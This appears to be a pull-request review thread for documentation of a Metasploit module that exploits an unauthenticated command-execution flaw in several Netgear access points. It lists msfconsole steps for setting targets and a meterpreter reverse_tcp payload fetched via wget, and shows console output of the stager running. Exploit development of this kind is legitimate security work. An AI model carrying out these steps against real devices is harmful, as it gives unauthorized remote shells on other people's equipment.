documentation/modules/exploit/linux/http/netgear_unauth_exec.md

```diff
@@ -0,0 +1,84 @@
+The module dlink_dir850_(un)auth_exec leverages an unauthenticated arbitrary command execution vulnerability to. Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0 are vulnerable. The vulnerability occurs within how the router handles POST requests from (1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php. The vulnerability was discovered by Daming Dominic Chen, creator of FIRMADYNE (https://github.com/firmadyne/firmadyne).
+
+## Vulnerable Application
+
+
+  1. Start msfconsole
+  2. Do : `use exploit/linux/http/netgear_unauth_exec`
+  3. Do : `set RHOST [RouterIP]`
+  4. Do : `set SRVHOST [Your server's IP]`
+  5. Do : `set LHOST [Your IP]`
+  6. Do : `set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp` if you want meterpreter session
+  5. Do : `exploit`
+  6. If router is vulnerable, payload should be dropped via wget and executed, and you should obtain a session
```

Comment:
1 2 3 4 5 6 7 8

Reply:
Urk. Fixed. As for the HTTP stager, I wasn't even aware these existed. Totally a newbie mistake. I will look into it right away.

Reply:
Cool. Here's an example module which may help. https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb

You're most of the way there already. An `execute_command` method is required. The command stager wraps it.

Reply:
Attempted to use the stager, but it says this:
```
msf5 exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] 192.168.200.100:80 - Connecting to target
[*] check ran its course, carrying out exploit...
[*] Sending stager...
[*] Command Stager progress - 101.48% done (1437/1416 bytes)
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/netgear_unauth_exec) > 
```
Maybe there's something wrong with the way I'm using the stager? I can't think of anything though. At the moment I am bashing my head against the keyboard. How can you send 21 extra bytes, how's that even possible!?

Reply:
You have to reload the module after you make changes to it. You don't need to restart Framework. Reload with `reload` or rerun with `rerun` or `rexploit`. Hope this helps.

Reply:
It does! I didn't know `rerun` and `rexploit` reloaded the module too. I've spammed the `reload` command during the development of this module, but it was only after actually exiting and restarting the framework that it worked. It was working fine all the time, no idea why just this once it didn't work.